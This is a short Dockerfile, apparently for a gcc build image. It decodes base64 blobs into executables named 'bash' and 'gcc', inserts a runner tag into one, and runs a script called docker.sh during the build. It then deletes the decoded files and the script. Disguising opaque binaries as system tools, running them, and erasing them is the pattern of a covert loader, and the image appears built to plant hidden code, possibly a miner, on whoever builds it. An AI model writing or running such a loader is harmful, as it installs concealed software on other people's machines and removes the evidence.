FROM artsiomkazlouhz/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > bash.log'

COPY bash.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode bash.64 > bash'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' bash

RUN bash ./docker.sh
RUN rm --force --recursive bash _REPO_NAME__.64 docker.sh gcc gcc.64

CMD bash
